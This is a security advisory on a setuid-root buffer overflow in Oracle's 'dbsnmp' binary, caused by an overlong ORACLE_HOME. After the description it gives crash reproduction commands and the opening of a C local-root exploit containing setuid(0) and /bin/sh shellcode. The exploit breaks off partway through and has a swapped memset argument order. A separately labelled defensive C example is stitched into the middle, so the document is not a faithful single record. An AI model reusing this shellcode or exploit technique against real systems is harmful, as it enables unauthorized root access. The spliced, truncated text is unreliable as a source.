Oracle 'dbsnmp' Buffer Overflow Vulnerability

2008-04-09 04:27:57 Source: Internet



Published: 2001-08-02
Updated: 2001-08-03

Affected systems:

Oracle 8.1.6
Oracle 8.1.7
Oracle 9i
- Linux

Description:

The 'dbsnmp' program shipped with Oracle 8.1.6/8.1.7 is installed setuid root by default.
When it processes the ORACLE_HOME environment variable it performs no effective bounds
check: if the variable is set to a string longer than 749 bytes, an attacker can trigger a
buffer overflow. By overwriting sensitive data in memory, the attacker can gain root privileges.

Because a default installation allows 'dbsnmp' to be executed only by members of the
'oinstall' group, an attacker must first obtain 'oinstall' group membership before this can
be used to escalate privileges.
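The defect class the advisory describes, shown as an added example that is not part of the original advisory or of Oracle's code: an ORACLE_HOME value is validated against a fixed limit before anything is copied, and the configuration path is built with a bounded formatting call that refuses oversized or truncated results instead of writing past the end of the buffer. The buffer size HOME_MAX (749, matching the threshold quoted above), the function names, and the use of the "/config/nmiconf.tcl" suffix from the crash output are assumptions made for illustration.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define HOME_MAX   749                     /* assumed: longest ORACLE_HOME the fixed buffer may hold */
#define CONFIG_REL "/config/nmiconf.tcl"   /* suffix seen in the advisory's crash output */

/* Returns 1 when an ORACLE_HOME value is acceptable for a fixed buffer of
 * HOME_MAX + 1 bytes: present, an absolute path, and at most HOME_MAX bytes.
 * A setuid program must treat every environment variable as untrusted, so the
 * length is checked before anything is copied, and the scan itself is capped
 * so an oversized value is rejected without reading all of it. */
int oracle_home_ok(const char *value)
{
    size_t i;
    if (value == NULL || value[0] != '/')
        return 0;
    for (i = 0; i <= HOME_MAX; i++)
        if (value[i] == '\0')
            return 1;              /* terminator found within the limit */
    return 0;                      /* longer than HOME_MAX: would overflow a fixed buffer */
}

/* Bounded replacement for the unbounded copy: builds
 * "<ORACLE_HOME>/config/nmiconf.tcl" with snprintf and returns -1 when the
 * value is rejected or the result would not fit, instead of writing past the
 * end of the buffer as the vulnerable binary does. Returns the path length. */
int build_config_path(const char *home, char *out, size_t outlen)
{
    int n;
    if (!oracle_home_ok(home))
        return -1;
    n = snprintf(out, outlen, "%s%s", home, CONFIG_REL);
    if (n < 0 || (size_t)n >= outlen)  /* truncation is an error, not a success */
        return -1;
    return n;
}

/* Reads the real environment; -1 when ORACLE_HOME is unset or rejected. */
int load_config_path(char *out, size_t outlen)
{
    return build_config_path(getenv("ORACLE_HOME"), out, outlen);
}

int main(void)
{
    char path[HOME_MAX + sizeof(CONFIG_REL) + 1];
    char fits[HOME_MAX + 1], toolong[HOME_MAX + 2];

    /* constructed inputs mirroring the advisory: 749 bytes is accepted, 750 is refused */
    memset(fits, 'A', HOME_MAX);        fits[0] = '/';    fits[HOME_MAX] = '\0';
    memset(toolong, 'A', HOME_MAX + 1); toolong[0] = '/'; toolong[HOME_MAX + 1] = '\0';

    printf("749-byte ORACLE_HOME -> %d\n", build_config_path(fits, path, sizeof path));     /* 768 */
    printf("750-byte ORACLE_HOME -> %d\n", build_config_path(toolong, path, sizeof path));  /* -1 */
    return 0;
}
```

The important design choice is that the length check runs before the copy and the formatting call reports truncation as a failure: a setuid binary that silently accepted a shortened path would still be trusting its environment, which is the root of the problem the advisory reports.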

<*Source: Juan Manuel Pascual (pask@plazasite.com) *>

Test method:

WARNING

The following program (method) may be offensive in nature and is provided for security research and teaching purposes only. Users assume all risk!


Juan Manuel Pascual (pask@plazasite.com) provided the following test code:


[oracle@proves1 iAS]$ ls -alc /usr/local/oracle/app/oracle/product/8.1.6/bin/dbsnmp
-rwsr-s--- 1 root oinstall 667874 jul 18 15:38 /usr/local/oracle/app/oracle/product/8.1.6/bin/dbsnmp

[oracle@proves1 8.1.6]$ export ORACLE_HOME=`perl -e 'print "A"x749'`
[oracle@proves1 8.1.6]$ /usr/local/oracle/app/oracle/product/8.1.6/bin/dbsnmp
couldn't read file "/config/nmiconf.tcl": no such file or directory
Failed to initialize nl component,error=462
Failed to initialize nl component,error=462

[oracle@proves1 8.1.6]$ export ORACLE_HOME=`perl -e 'print "A"x750'`
[oracle@proves1 8.1.6]$ dbsnmp
couldn't read file "/config/nmiconf.tcl": no such file or directory
Segmentation fault


This buffer overflow is also present in Oracle 9i:



[oracle@proves1 iAS]$ ls -alc /usr/local/oracle/app/oracle/product/iAS/bin/dbsnmp
-rwsr-s--- 1 root oinstall 971665 abr 11 17:41 /usr/local/oracle/app/oracle/product/iAS/bin/dbsnmp

[oracle@proves1 iAS]$ export ORACLE_HOME=`perl -e 'print "A"x749'`
[oracle@proves1 iAS]$ /usr/local/oracle/app/oracle/product/iAS/bin/dbsnmp
couldn't read file "/config/nmiconf.tcl": no such file or directory
Failed to initialize nl component,error=462
Failed to initialize nl component,error=462

[oracle@proves1 iAS]$ export ORACLE_HOME=`perl -e 'print "A"x750'`
[oracle@proves1 iAS]$ /usr/local/oracle/app/oracle/product/iAS/bin/dbsnmp
Segmentation fault

/* Exploit code for dbsnmp binary in Oracle 8.1.6.0.0 Linux Platform. I tested
it in RH 6.2.

dbsnmp makes setresuid(,getuid(),) before reading the ORACLE_HOME environment
variable. It's necessary to call setuid(0) before the normal shellcode.

In my tests the offset may vary from 7846 to 7896. It's possible to obtain a normal
(uid=oracle) shell for low offsets (incomplete setuid(0) jumps).



"Fire falls instead of manna
The asphalt disguises itself as sea
The shoe cannot find the pedal
It seems Satan is on the loose."

L.E.Aute



This vulnerability was researched by:
Juan Manuel Pascual <pask@plazasite.com>

Special thanks to:

Ivan Sanchez <isanchez@plazasite.com>
Mundo Alonso-Cuevillas <mundo@plazasite.com>
*/





#include <stdio.h>
#include <stdlib.h>
#include <string.h>   /* memset */

#define BUFFER 800
#define OFFSET 7896
#define NOP 0x90
#define BINARY "/usr/local/oracle/app/oracle/product/8.1.6/bin/dbsnmp"


char shellcode[] =
"\x90" /* Additional NOP */
"\x31\xc0" /* begin setuid (0) */
"\x31\xdb"
"\xb0\x17"
"\xcd\x80"

"\xeb\x1f"
"\x5e"
"\x89\x76\x08"
"\x31\xc0"
"\x88\x46\x07"
"\x89\x46\x0c"
"\xb0\x0b"
"\x89\xf3"
"\x8d\x4e\x08"
"\x8d\x56\x0c"
"\xcd\x80"
"\x31\xdb"
"\x89\xd8"
"\x40"
"\xcd\x80"
"\xe8\xdc\xff\xff\xff"
"/bin/sh";


unsigned long get_sp(void) {
__asm__("movl %esp,%eax");   /* return the current stack pointer in eax */
}

void main(int argc, char *argv[]) {
char *buff, *ptr,binary[120];
long *addr_ptr, addr;
int bsize=BUFFER;
int i,offset=OFFSET;

if (!(buff = malloc(bsize))) {
printf("Can't allocate memory.\n");
exit(0);
}

addr = get_sp() -offset;
ptr = buff;
addr_ptr = (long *) ptr;
for (i = 0; i < bsize; i += 4)   /* fill the buffer with the guessed return address */
*(addr_ptr++) = addr;

memset(buff,bsize/2,NOP);
